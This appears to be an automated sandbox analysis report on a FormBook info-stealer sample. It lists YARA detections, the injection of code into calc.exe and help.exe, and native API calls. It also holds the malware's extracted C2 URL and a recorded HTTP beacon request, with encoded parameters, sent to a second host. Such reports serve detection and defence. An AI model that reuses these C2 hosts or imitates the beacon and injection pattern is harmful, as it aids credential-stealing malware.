          Source: Yara match; File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY
          Source: 9.2.calc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
          Source: unknown; HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: Binary string: calc.pdbGCTL; source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP; source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP; source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: calc.pdb; source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb; source: calc.exe, help.exe
          Source: Binary string: help.pdbGCTL; source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb; source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb; source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\calc.exe; Code function: 4x nop then pop ebx; 9_2_00407AFA
          Source: C:\Windows\SysWOW64\calc.exe; Code function: 4x nop then pop edi; 9_2_0040E43F
          Source: C:\Windows\SysWOW64\help.exe; Code function: 4x nop then pop ebx; 19_2_001A7AFB
          Source: C:\Windows\SysWOW64\help.exe; Code function: 4x nop then pop edi; 19_2_001AE43F

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor; URLs: www.homekeycap.com/pjje/
          Source: global traffic; HTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1; Host: www.rajuherbalandspicegarden.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: Joe Sandbox View; IP Address: 162.159.134.233
          Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknown; DNS traffic detected: queries for: google.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknown; Network traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknown; HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match; File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Very long command line found
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Process created: Commandline size = 4201
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Process created: Commandline size = 4201
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419D50 NtCreateFile
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E00 NtReadFile
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E80 NtClose
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419F30 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419D4B NtCreateFile
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419DFB NtReadFile
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E4A NtClose
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E7A NtClose
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E98F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E97A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E95D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EA770 NtOpenThread
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9FE0 NtCreateMutant
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E96D0 NtCreateKey
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9560 NtWriteFile
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC96D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC95D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACA770 NtOpenThread
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9560 NtWriteFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9D50 NtCreateFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E00 NtReadFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E80 NtClose
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9F30 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9D4B NtCreateFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9DFB NtReadFile
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E4A NtClose
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E7A NtClose
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041D84E
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041E066
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00401030
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041E94D
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041D1F1
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041DA23
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041DB36
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00402D89
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041BE22
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00409E30
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03472B28
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033DEBB0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_034722AE
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033C4120
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033AF900
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03461002
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033D20A0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033BB090
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_034720A8
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03471FF1
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033C6E30
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03472EF7
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03471D55
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033A0D20
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_03472D07
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033D2581
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033BD5E0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033B841F
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AA6E30
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ABEBB0
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A9B090
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02B41002
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A9841F
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A9D5E0
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A80D20
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AA4120
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02A8F900
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02B51D55
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BD84E
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BE066
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BE94D
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BDA23
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BDB36
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A2D90
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A2D89
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A9E30
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001BBE22
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001A2FB0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 033AB150 appears 35 times
          Source: C:\Windows\SysWOW64\help.exe | Code function: String function: 02A8B150 appears 32 times
          Source: s2rsXUiUn8.exe | Static PE information: Number of sections : 11 > 10
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
